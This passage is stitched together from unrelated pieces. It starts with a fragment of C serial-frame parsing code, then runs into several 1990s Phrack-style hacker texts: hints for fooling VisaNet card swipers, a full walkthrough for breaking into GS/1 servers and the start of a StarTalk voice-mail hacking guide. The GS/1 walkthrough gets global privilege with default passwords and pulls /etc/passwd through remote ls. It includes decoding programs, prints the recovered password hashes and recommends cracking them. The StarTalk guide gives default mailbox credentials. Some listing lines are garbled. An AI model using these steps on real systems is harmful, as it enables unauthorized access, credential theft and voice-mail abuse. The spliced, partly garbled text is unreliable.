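    if (buf[i] != STX)
        return FRAME_NO_STX;
    start = ++i;

    /* XOR from the first byte past stx up to and including etx or etb. */
    for (; i < n; i++) {
        lrc ^= buf[i];
        if (buf[i] == ETX || buf[i] == ETB)
            break;
    }
    if (i + 1 >= n)                  /* terminator or lrc byte not received yet */
        return FRAME_INCOMPLETE;

    f->msg = buf + start;
    f->len = i - start;
    f->last = (buf[i] == ETX);
    f->used = i + 2;
    /* The byte after the terminator is the lrc whatever its value: it is
       compared, never interpreted as a control character. */
    return buf[i + 1] == lrc ? FRAME_GOOD : FRAME_BAD_LRC;
}

/* Control character to send back, or 0 when nothing should be sent yet. */
unsigned char frame_reply(int status)
{
    if (status == FRAME_GOOD)
        return ACK;
    if (status == FRAME_BAD_LRC || status == FRAME_NO_STX)
        return NAK;
    return 0;
}

int main(void)
{
    /* Constructed frame: the lrc of "@A" plus etx works out to 0x02 (stx). */
    const unsigned char sample[] = { STX, '@', 'A', ETX, 0x02 };
    struct frame f;
    int rc = frame_parse(sample, sizeof sample, &f);

    printf("status=%d reply=0x%02X\n", rc, (unsigned)frame_reply(rc));
    return rc == FRAME_GOOD ? 0 : 1;
}
```

A receiver that scans the stream for the next stx instead of taking exactly one byte after the terminator would treat the lrc of the sample frame as the start of a new message.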


[ section four ] 
[ half the story; central data capture ] 


a full transaction requires two steps, one of which is described in this
document: getting the initial authorization. an authorization does basically
nothing to a person’s account. oh, you could shut somebody’s account down for
a day or two by requesting a twenty thousand dollar authorization, but no other
ill effects would result. central data capture, the second and final step in a
transaction, needs information from both the authorization request and
response, which is used to generate additional data records. these records are
then sent to visanet by the merchant in a group, usually at the end of each day.


[ section five ] 
[ common applications ]


access to visanet can be implemented in a number of ways: directly on a pos 
terminal, indirectly via a lan, in a hardware specific device, or any 
permutation possible to perform the necessary procedures. card swipers commonly 
seen at malls are low tech, leased at around fifty dollars per month, per 
terminal. they have limited capacity, but are useful in that all of the 
information necessary for transactions is self contained. dr delam and maldoror 
found this out, and were delighted to play the role of visanet in fooling the 
little device. close scrutiny of section one reveals atm formats, phone order 
procedures, and new services such as direct debit from checking/savings and 
checks by phone. start noticing the stickers for telecheck and visa atm cards, 
and you’re starting to get the picture. 


[ section seven ] 
[ brave new world ] 


could it be? yes, expiration dates really don’t matter.... 
this article written to thank previous Phrack writers... 
please thank me appropriately... 

800#S exist... 


other services exist... mastercard runs one... 
never underestimate the power of asking nicely... 
numerous other formats are available... see section one, 3.0 for hints... 


never whistle while you’re pissing...


<>                                                                    <>
<>  ----+++===:::  GETTIN’ DOWN ’N DIRTy wiT Da GS/1  :::===+++----   <>
<>                                                                    <>
<>  Brought to you by:                                                <>
<>  [)elamO Labz, Inc. and ChURcH oF ThE Non-CoNForMisT               <>
<>                                                                    <>
<>  Story line: Maldoror -n- [)r. [)elam                              <>
<>  Main Characters: Menacing Maldoror & The Evil [)r. [)elam         <>
<>  Unix Technical Expertise: Wunder-Boy [)elam                       <>
<>  Sysco Technishun: Marvelous Maldoror                              <>
<>                                                                    <>
<>  Look for other fine [)elamo Labz and ChURcH oF ThE                <>
<>  Non-CoNForMisT products already on the market such as             <>
<>  DEPL (Delam’s Elite Password Leecher), NUIA (Maldoror’s           <>
<>  Tymnet NUI Attacker), TNET.SLT (Delam’s cheapO Telenet            <>
<>  skanner for Telix), PREFIX (Maldoror’s telephone prefix           <>
<>  identification program), and various other programs and           <>
<>  philez written by Dr. Delam, Maldoror, Green Paradox,             <>
<>  El Penga, Hellpop, and other certified DLI and CNC members.       <>
<>                                                                    <>

Connecting to the boot server
Getting the boot server password file


Here’s hacking a GS/1 made EZ (for the sophisticated hacker) It is 
advisable to fill your stein with Sysco and pay close attention... if 
Sysco is not available in your area, Hacker Pschorr beer will work 
almost as good... (especially Oktoberfest variety) 


What is a GS/1? 


A GS/1 allows a user to connect to various other computers... in other 
words, it’s a server, like a DEC or Xyplex. 


So why hack it? 


Cuz itz there... and plus you kan access all sortz of net stuph fer 
phree. (QSD @ 208057040540 is lame and if you connect to it, you’re 
wasting the GS/1.. the French fone police will fly over to your country 
and hunt you down like a wild pack of dogs, then hang you by your own 
twisted pair.) 


What to do:


+ #1. Finding and identifying a GS/1 +


Find a GS/1 .. they’re EZ to identify... they usually have a prompt of
GS/1, though the prompt can be set to whatever you want it to be. A
few years ago there were quite a number of GS/1’s laying around on
Tymnet and Telenet... you can still find a few if you scan the right
DNIC’s. (If you don’t know what the hell I’m talking about, look at
some old Phracks and LOD tech. journals.)


The prompt will look similar to this:


(!2) GS/1>


(The (!2) refers to the port you are on)


+ #2. Getting help +


First try typing a ’?’ to display help items.


A help listing looks like this:


> (!2) GS/1>?
> Connect <address>[,<address>]
> DO <macro-name>
> Echo <string>
> Listen
> Pause [<seconds>]
> PIng <address> [ timeout ]
> SET <param-name> = <value>
> SHow <argument>


At higher privileges such as global (mentioned next) the help will
look like this (note the difference in the GS/1 prompt with a # sign):


> (!2) GS/1# ?
> BRoadcast ( <address> ) <string>
> Connect ( <address> ) <address>[,<address>] [ ECM ] [ Q ]
> DEFine <macro-name> = ( <text> )
> DisConnect ( <address> ) [<session number>]
> DO ( <address> ) <macro-name>
> Echo <string>
> Listen ( <address> )
> Pause [<seconds>]
> PIng <address> [ timeout ]
> ReaD ( <address> ) <option> <parameter>
> REMOTE <address>
> ROtary ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>]
> SAve ( <address> ) <option> <filename>
> SET ( <address> ) <param-name> = <value>
> SETDefault ( <address> ) [<param-name> = <value>]
> SHow ( <address> ) <argument>
> UNDefine ( <address> ) <macro-name>
> UNSave ( <address> ) <filename>
> ZeroMacros ( <address> )
> ZeroStats ( <address> )

Additional commands under global privilege are: BRoadcast, DEFine,
DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
ZeroStats, and a few extra options under the normal user commands.


If you need in-depth help for any of the commands, you can again use the
’?’ in the following fashion:


> (!2) GS/1>sho ?
> SHow ADDRess
> SHow ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ]
> SHow DefaultParameters [<param-name> ...]
> SHow GLobalPARameters
> SHow NetMAP [ Short | Long ]
> SHow PARAmeterS [<param-name> ...]
> SHow <param-name>
> SHow SESsions [ P ]
> SHow VERSion

> (!2) GS/1>sh add?
> SHow ADDRess

> (!2) GS/1>sh add
> ADDRess = &000023B5%07000201E1D7!2


"sh add" displays your own network, address and port number. 


The network is 000023B5 
The address is 07000201E1D7 
The port number is 2 


+ #3. Gaining top privilege access +


Figure out the global password.


Do a "set priv=global" command.

Note:
There are 3 states to set priv to: user, local, and global. Global is
the state with the most privilege. When you attain global privilege,
your prompt will change to have a ’#’ sign at the end of it.. this means
you have top privilege (similar to *nix’s super user prompt).


The GS/1 will prompt you for a password. The default password on GS/1’s 
is to have no password at all... The GS/1 will still prompt you for a 
password, but you can enter anything at this point if the password was 
never set. 


+ #4. Finding the boot server + 


Figure out the boot server address available from this GS/1 


The boot server is what lies under the GS/1. We’ve found that GS/1’s are
actually run on a Xenix operating system... (which is of course a nice
phamiliar territory) It’s debatable whether all GS/1’s are run on Xenix or
not as we have yet to contact the company. (We may put out a 2nd file going
into more detail.)


Do a "Sh b" or "Sh global" as shown in the following examples:


> (!2) GS/1# sh b
> BAud = 9600                          BootServerAddress = &00000000%070002017781
> BReakAction = ( FlushVC, InBand )    BReakChar = Disabled
> BSDelay = None                       BUffersize = 82

> (!2) GS/1# sh global
> Global Parameters
> DATE = Wed Jun 22 21:16:45 1994      TimeZone = 480 minutes
> DaylightSavingsTime = 0 minutes      LogoffStr = "L8r laM3r"
> WelcomeString = "Welcome to your haqued server (!2), Connected to "
> DOmain = "thelabz"                   Organization = "delamO"
> PROmpt = "GS/1>"                     NMPrompt = "GS/1# "
> LocalPassWord = ""                   GlobalPassWord = "haque-me"
> NetMapBroadcast = ON                 MacType = EtherNET
> CONNectAudit = ON                    ERRorAudit = ON
> AUditServerAddress = &000031A4%07000200A3D4
> AUditTrailType = Local
> BootServerAddress = &00000000%070002017781


Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
these are the actual passwords that need to be entered (or in the case
of the LocalPassWord, "" matches any string). You’ll only be able to
"sh global" after a successful "set priv=global".


Now that you have the boot server address, the next step is enabling 
communication to the boot server. 


+ #5. Connecting to the boot server + 


Do a REMOTE <address> where address is the address of the machine you
want to issue remote commands to.

> (!2) GS/1# REMOTE %070002017781
> (!2) Remote: ?
> Bind <address> [-f <bootfile>] [-l <loader>] [<nports>]
> BRoadcast ( <address> ) "<string>"
> CoPyfile [<address>:]<pathname> [<address>:] [<pathname>]
> List [ -ls1CR ] [<pathname> ...]
> MoVe <pathname> <pathname>
> NAme <clearinghouse name> = <address>[,<address>]...
> Ping <address> [timeout]
> ReMove <pathname>
> SE [( <address> )] <param-name> = <value>
> SETDefault <param-name> = <value>
> SHow <argument>
> UNBind <address>
> UNDefine <macro name>
> UNName <name>
> ZeroStats
> <BREAK> (to leave remote mode)

Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
you will be issuing commands to whatever remote machine you specified
by the REMOTE <address> command.


Notice for this case, the boot server’s address was used. 


When you get the REMOTE: prompt, you can issue commands that will be 
executed on the remote machine. Try doing a ’?’ to see if it’s another 
GS/1.. if not, try doing ’ls’ to see if you have a *nix type machine. 


Also notice that the help commands on the remote are not the same as
those for the GS/1 (though, if you establish a remote link with another
GS/1 they will be the same).

> (!2) Remote: ls -l
> total 1174
> drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC
> drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL
> drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP
> drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN
> drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS
> drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP
> drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC
> drwxrwxrwx 2 ncs ncs 160 Jun 4 04:13 GLOBALS
> -rw-r--r-- 1 ncs ncs 228 Jun 5 00:59 btdata
> -rw-r--r-- 1 ncs ncs 8192 Jun 8 1993 chnames.dir
> -rw-r--r-- 1 ncs ncs 11264 Jun 1 13:41 chnames.pag
> drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
> -rw-rw-rw- 1 ncs ncs 557056 Mar 23 1992 macros
> -rw-r--r-- 1 ncs ncs 512 Oct 22 1993 passwd


Look familiar?? If not, go to the nearest convenience store and buy
a 12 pack of the cheapest beer you can find... leave your computer
connected so you hurry back, and slam eight or nine cold onez... then
look at the screen again.


You’re basically doing a Remote Procedure Call for ls to your Xenix boot
server.


Notice at this point that the "passwd" is not owned by root. This is 
because this is not the system password file, and you are not in the 
"/etc" directory... (yet) 


There are a couple of problems:

> (!2) Remote: cat
> Invalid REMOTE command
> (!2) Remote: cd /etc
> Invalid REMOTE command


You cannot view files and you cannot change directories. 


To solve the "cd" problem do the following:

> (!2) Remote: ls -l
> total 26
> drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS
> drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm
> drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup
> drwxr-xr-x 2 bin bin 1552 Aug 17 1989 bin
> drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib
> drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub
> drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool
> drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys
> drwxr-x--- 2 root root 48 Aug 17 1989 sysadm
> drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp
>
> (!2) Remote: ls -l ../..
> total 1402
> -rw-r--r-- 1 root root 1605 Aug 17 1989 .login
> -rw-r--r-- 1 ncs ncs 1605 Aug 28 1990 .login.ncs
> -rw-r--r-- 1 root root 653 Aug 17 1989 .logout
> -rw-r--r-- 1 ncs ncs 653 Aug 28 1990 .logout.ncs
> -rw------- 1 root root 427 Aug 17 1989 .profile
> drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin
> oeboSHscS a 1 bin bin 25526 May 4 1989 boot
> drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev
> -r-------- 1 bin bin 577 Nov 3 1987 dos
> drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc
> drwxr-xr-x 2 bin bin 64 Aug 1989 lib
> drwx------ 2 bin bin 1024 Aug 1989 lost+found
> drwxr-xr-x 2 bin bin 32 Aug 1989 mnt
> drwxrwxrwx 2 bin bin 512 Jun 01:20 tmp
> drwxr-xr-x 14 bin bin 224 Aug 1989 usr
> -rw-r--r-- 1 bin bin 373107 Aug 1989 xenix
> -rw-r--r-- 1 root root 287702 Aug 1989 xenix.old


Your brain should now experience deja vous.. you just found the
root directory. (for the non-*nix, lamO-hacker, the root directory
has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)


Now you can get to /etc/passwd as follows:


> (!2) Remote: ls -l ../../etc
> total 1954
> -rwx--x--x 1 bin bin 7110 May accton
> -rwx------ 1 bin bin 1943 May asktime
> -rwx------ 1 bin bin 31756 May badtrk
> -rw-rw-rw- 1 root root 1200 Apr bootlog
> -rwx--x--x 1 bin bin 24726 May brand
> -rw-r--r-- 1 bin bin Leh Aug checklist
> -rw-r--r-- 2 bin bin 17 Aug checklist.last
> -rw-r--r-- 1 ncs ncs 17 Aug checklist.ncs
> -rw-r--r-- 2 bin bin 17 Aug checklist.orig
> -rwx------ 1 bin bin 2857 May chsh
> Sob WwxX-so a= 1 bin bin 7550 May rou Bacal
> -rwx------ 1 bin bin 8034 May cmos
> -rwxr-xr-x 1 root bin 31090 Aug cron
> -rw-r--r-- 1 bin bin 369 May cshrc
> etc.
> -rw-r--r-- 1 root root 465 Mar passwd


Yeah, now what?!


You've found the /etc/passwd file, but you don’t have "cat" to type the
file out. Now you’re stuck... so drink a half a bottle of Sysco per
person. (We did... and as you’ll see, Sysco is the drink of a manly hackers
like us... make sure it’s the big bottle kind not those girly small
onez.)


+ #6. Getting the boot server password file +


There is one way to get around the cat problem (no itz nOt puttin
catnip laced with somethin U made frum a phile on yer doorstep).
It’s done using ls. On this Xenix system, the directory structure is
the old Unix format: A 16 byte record comprised of a 2 byte I-number
and a 14 byte character field.


Note about directory structure for the inquisitive hacker:
In a directory record there is a 14 byte string containing the file
name, and the 2 byte I-number (2 bytes = an integer in this case)
which is a number that is an (I)ndex pointer to the I-node. The
I-node then contains the information about where the file’s data is
actually kept (similar to how a FAT table works on an IBM PC yet a
different concept as it has indirect index blocks etc. I won’t get
into) and what permissions are set for the file. Be warned that in
newer *nix implementations, file names can be more than 14 characters
and the directory structure will be a bit different than discussed.


The "ls" command has an option that allows you to tell it "this *file* is
a *directory*.. so show me what’s in the directory"... newer *nix
systems won’t like this (the -f option) because of the new directory
structure.


> (!2) Remote: ls -?
> ls: illegal option --?
> usage: -1ACFRabcdfgilmnopqrstux [files]
>
> (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
> 28530 ot:BJ1x/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
> 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
> 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
> 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
> 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
> 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
> 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
> 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
> 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
> 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
> 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
> 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFmHnL
> 22327 xcU:100:100:NC 8275 operator:/usr/
>
> (!2) Remote: <BRK>
> (!2) GS/1#

Wow, kewl. Now that you have a bunch-o-shit on your screen, you have
to make some sense out of it.


The password file is almost legible, but the I-numbers still need to be 
converted to ASCII characters. This can be accomplished in a variety of 
ways... the easiest is to write a program like the following in C: 


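On a PC the following code should work:


#include <stdio.h>

int main(void)
{
    /* Overlay the integer with its two bytes (low byte first on a PC) */
    union {
        int i;
        char c[2];
    } x;

    while (1) {
        printf("Enter I-Number: ");
        /* Stop on EOF or non-numeric input instead of looping forever */
        if (scanf("%d", &x.i) != 1)
            break;
        printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
    }
    return 0;
}


On a *nix based system the following code will work (depending on
word size and byte arrangement):


#include <stdio.h>

int main(void)
{
    /* Same overlay with a 16-bit short; the bytes are printed swapped */
    union {
        short int i;
        char c[2];
    } x;

    while (1) {
        printf("Enter I-Number: ");
        /* Stop on EOF or non-numeric input instead of looping forever */
        if (scanf("%hd", &x.i) != 1)
            break;
        printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
    }
    return 0;
}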
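The 16-byte record layout from the directory-structure note and the I-number conversion done by the two programs above, combined in one added example (not code from the original article): it splits a byte buffer into 2-byte I-number plus 14-byte name records with explicit shifts, so the result does not depend on the host's word size or byte order, and it handles a short final record. The function names and the sample line are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DIRSIZ 14            /* width of the name field */
#define RECSZ  (2 + DIRSIZ)  /* 2-byte I-number + 14-byte name = 16 bytes */

struct old_dirent {
    uint16_t ino;              /* I-number, low byte first as on the page */
    char     name[DIRSIZ + 1]; /* name field, NUL-terminated for printing */
    size_t   used;             /* bytes of this record present in the input */
};

/* Constructed sample input (not taken from the article): one passwd-style
 * line of 40 bytes, i.e. two full records and one short one. */
static const unsigned char SAMPLE[] =
    "root:*:0:0:Constructed sample:/:/bin/sh\n";
#define SAMPLE_LEN (sizeof(SAMPLE) - 1)

/* Decode record number idx of buf the way a directory reader would.
 * Returns 1 on success, 0 when idx lies past the end of the data.
 * A short final record is zero-padded; 'used' keeps its real length. */
int dir_decode(const unsigned char *buf, size_t len, size_t idx,
               struct old_dirent *out)
{
    unsigned char rec[RECSZ] = {0};
    size_t off = idx * RECSZ;

    if (off >= len)
        return 0;
    out->used = (len - off < RECSZ) ? len - off : RECSZ;
    memcpy(rec, buf + off, out->used);
    /* Explicit shifts give the same answer on any host byte order, which is
     * the portability problem the two union programs work around. */
    out->ino = (uint16_t)(rec[0] | (rec[1] << 8));
    memcpy(out->name, rec + 2, DIRSIZ);
    out->name[DIRSIZ] = '\0';
    return 1;
}

/* Render the name field as ls shows it: non-printable bytes become '?'.
 * out must hold DIRSIZ + 1 bytes. */
void ls_render(const struct old_dirent *d, char *out)
{
    size_t i, n = d->used > 2 ? d->used - 2 : 0;

    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)d->name[i];
        out[i] = (c >= 0x20 && c < 0x7f) ? (char)c : '?';
    }
    out[i] = '\0';
}

/* Inverse step: turn decoded records back into the original byte stream.
 * Returns the number of bytes written, or 0 if dst is too small. */
size_t dir_rebuild(const unsigned char *buf, size_t len,
                   unsigned char *dst, size_t cap)
{
    struct old_dirent d;
    size_t idx, n = 0;

    for (idx = 0; dir_decode(buf, len, idx, &d); idx++) {
        unsigned char rec[RECSZ];

        rec[0] = (unsigned char)(d.ino & 0xff);  /* low byte = 1st character */
        rec[1] = (unsigned char)(d.ino >> 8);    /* high byte = 2nd character */
        memcpy(rec + 2, d.name, DIRSIZ);
        if (n + d.used > cap)
            return 0;
        memcpy(dst + n, rec, d.used);
        n += d.used;
    }
    return n;
}

int main(void)
{
    struct old_dirent d;
    char shown[DIRSIZ + 1];
    size_t idx;

    /* Print each record as an "I-number name" pair */
    for (idx = 0; dir_decode(SAMPLE, SAMPLE_LEN, idx, &d); idx++) {
        ls_render(&d, shown);
        printf("%5u %-14s\n", (unsigned)d.ino, shown);
    }
    return 0;
}
```

The first record of the constructed sample starts with the characters "ro", which decode to the same I-number, 28530, that opens the listing in the article.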


When you have translated the I-numbers you can substitute the ASCII
values by hand (or write a d0p3 program to do it for you):


28530 ot:BJ1x/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
28530 = [r][o] 30580 = [t][w] 14962 = [r][:]
root:BJ1x/e8APHetw:0:0:Super user:/:/bin/csh?sys


25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
25697 = [a][d] 14929 = [Q][:] 28265 = [i][n]
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr


29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
29487 = [/][s] 29283 = [c][r] 17210 = [:][C]
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for


28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
28704 = [ ][p] 14895 = [/][:] 13114 = [:][3]
periodic tasks:/:?bin:NOLOGIN:3:3:System file a


28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
28004 = [d][m] 29962 = [^M][u] 25697 = [a][d]
dministration:/:
uucp::4:4:Uucp administration:/


29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
29557 = [u][s] 27746 = [b][l] 28771 = [c][p]
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO


20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
20300 = [L][O] 25185 = [a][b] 26990 = [n][i]
LOGIN:6:6:Assignable device administration:/:?sy


26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
26995 = [s][i] 12602 = [:][1] 29811 = [s][t]
sinfo:NOLOGIN:10:10:Access to system information


12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
12090 = [:][/] 18759 = [G][I] 25710 = [n][d]
:/:?network:NOLOGIN:12:12:Mail and Network admin


29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
29545 = [i][s] 28528 = [p][o] 20302 = [N][O]
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri


29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
29806 = [n][t] 29545 = [i][s] 28528 = [p][o]
nt spooler administration:/usr/spool/lp:?dos:NOL


18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFmHnL
18255 = [O][G] 8307 = [s][ ] 12090 = [:][/]
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL


22327 xcU:100:100:NC 8275 operator:/usr/
22327 = [7][W] 8275 = [S][ ]
7WxcU:100:100:NCS operator:/usr


The resulting file will look like the following:


root:BJ1x/e8APHetw:0:0:Super user:/:/bin/csh?sys
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
dministration:/:
uucp::4:4:Uucp administration:/
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
LOGIN:6:6:Assignable device administration:/:?sy
sinfo:NOLOGIN:10:10:Access to system information
:/:?network:NOLOGIN:12:12:Mail and Network admin
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
nt spooler administration:/usr/spool/lp:?dos:NOL
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
7WxcU:100:100:NCS operator:/usr


Because the ls command cannot display "non-printable" characters such
as the carriage return, it will replace them with a ’?’ character...
delete the ’?’ characters and divide by line at these locations. When
you finish doing that, you’ll have a standard /etc/passwd file:


root:BJ1x/e8APHetw:0:0:Super user:/:/bin/csh
sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
bin:NOLOGIN:3:3:System file administration:/:
uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
asg:NOLOGIN:6:6:Assignable device administration:/:
sysinfo:NOLOGIN:10:10:Access to system information:/:
network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
dos:NOLOGIN:16:10:Access to Dos devices:/:
ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr


Once you’ve assembled your password file in a standard ASCII form,
you'll of course want to crack it with one of the many available DES
cracking programs.


+ #7: Other Avenues +


Find out what else you can play with by first finding what networks are
available other than your own, and second, find out what machines are on
your network:


>(!2) GS/1# sh att 

> Attached Networks 

>&000023B5 

>(!2) GS/1# sh nmap 1 

> NETWORK &000023B5 MAP 

> 

> 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1 

> 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020 
> 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS Qee deed 
> 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2 
> etc. 

The boot server address, from previous examples, is number 1
which contains a description "SW/AT-NCS". Examining the rest of the
list, number 6 has the same description. System 12 may be just another
address for the boot server or it may be a different Xenix... but it should
be Xenix whatever it is.

We have refrained from covering the typical GS/1 information that has been
published by others; and instead, covered newer concepts in GS/1 hacking.


This phile is not a complete guide to GS/1 hacking; but expect successive
publications on the topic.


(*) A Complete ’N Easy Guide to Hacking and the (*)
(*) Usage of "StarTalk" Voice Mail Systems (*) 


Written By: The Red Skull 
07/25/94 


Introduction 

There are many different types of voice mail systems out there, each
running on the phone systems it is compatible with. You have probably seen
a lot of text files about hacking voice mail systems on your local bulletin
boards. The popular ones you might have heard about are systems like Aspen
(Automatic Speech Exchange Network), TMC (The Message Center), Audix, and
Meridian Mail. There are VMB hacking programs that are supposed to hack vmbs
for you. I really don’t believe in those kind of programs. When I say this,
I am not talking about programs like Tone Locator or Blue Beep, I am talking
about programs like ’The Aspen Hacker’ and any other *VMB* hacking programs.
I am just saying this, so you don’t mix this guide up with a vmb hacking
program.


General Information 

I have decided to write a hacking/user’s guide for the StarTalk Voice 
Mail System because there is no guide for the StarTalk Voice Mail System, 
and almost no one has heard about it. Since this will be the first one for 
it, I will try and explain it as simply as possible. You might have heard 
of Northern Telecom. They are the makers of StarTalk, but they are also the 
makers of a very popular user-friendly Voice Mail System called ’Meridian 
Mail’. Both StarTalk and Meridian Mail run on the Norstar telephone system. 
StarTalk is designed to function as an extension of the Norstar telephone 
system. All the StarTalk software operation is done on a Norstar telephone 
set, so that means it doesn’t run on a computer terminal. There are 3 
different sizes and configurations that the StarTalk Voice Mail System 
comes with - 


o Model 110 - 2 voice channels, with 1 hour and 50 
minutes total storage. 


o Model 165 - 4 voice channels, with 2 hours and 45 
minutes total storage. 


o Model 385 - 4 voice channels, with 6 hours and 25 
minutes total storage. 
The capabilities of StarTalk Model 385 
can be further expanded through an 
enhancement option, available in 4, 6 
or 8 channel versions, which provides 
a total of 9 hours and 45 minutes of
storage. 


Right now, you might be wondering what the hell I’m talking about, but
it’s simple. The number of voice channels means how many voice mail users
could be using their voice mail. So for example, 4 voice channels means only
4 voice mail users could be on the voice mail system. The Model 110 can hold
about 25 boxes, the Model 165 can hold 50 boxes and the Model 385 can hold 120
boxes and higher. So, it’s better if you find a StarTalk Voice Mail System
that is running Model 385. The part that says ’with 6 hours and 25 minutes
total storage’ means how many hours of messages it can store. The Model 385
is also upgradable. I could go on about the models but that’s all we need to
know for now. So now that we’ve finished this, we will get into the part
that you’ve been waiting for.


Finding a StarTalk Voice Mail System 


You will probably not be able to recognize a StarTalk voice mail system 
if you find one using a war dialer, because when a StarTalk system answers, 
it will only have the company’s personalized automated greeting. There are 
only two ways to get a StarTalk system: you either scan it out yourself or 
get it from someone else. If you get it from someone else, all the boxes 
will probably be gone, used or just not safe. 


Recognizing a StarTalk Voice Mail System 


Ok, now let’s say you have come across a StarTalk system, how do you
know that it’s a StarTalk? As I said, you will not be able to tell if it’s a
StarTalk system by just calling it. If the system is a StarTalk, when the
company’s personalized greeting answers, press ’*’ and it should say -


"Please enter the mailbox number, or press the # sign to use the directory"


Remember, if you press ’*’ and just sit there, it will repeat the message
one more time, and then say "Exiting the system."


If you hit ’**’ it should say -
"Please enter your mailbox number and your password, then press # sign"


If you don’t get anything like this, that means it’s not a StarTalk Voice
Mail System. If you are still not sure that you have a StarTalk System,
then you can always call 416-777-2020 and listen to the voice and see
if it matches with what you have found.


Finding a Virgin Box

This is a very interesting step and also an easy one. Once you have
found a StarTalk Voice Mail System, the first thing you’ll want to do is
get some boxes on it. The interesting part is that you are always guaranteed
to get one box on a StarTalk System. This is because every StarTalk System
has a box that is for the voice mail users to leave any problems they are
experiencing with their vmb. This is the box that almost always has a default
on it, but if the System Admin is smart he will change it. So far, on all the
StarTalk systems that I have come across the default for this box hasn’t been
changed. The box number is ’101’ and the defaults for StarTalk Voice Mail
systems are ’0000’. So the first thing you should do is call up the system
and press *101 and the default greeting on the box should say (this greeting
is for box 101 only) -


"This is the Trouble-Report mailbox, if you are experiencing difficulty
using the messaging features, please leave your name, mailbox # and a
detailed description of the problem" *BEEP*


If it says that, press ’**’ and then when it asks you to enter your mailbox
number and your password, enter ’1010000’ and press the # sign. If you’ve
followed everything I’ve said and the System Admin hasn’t changed the
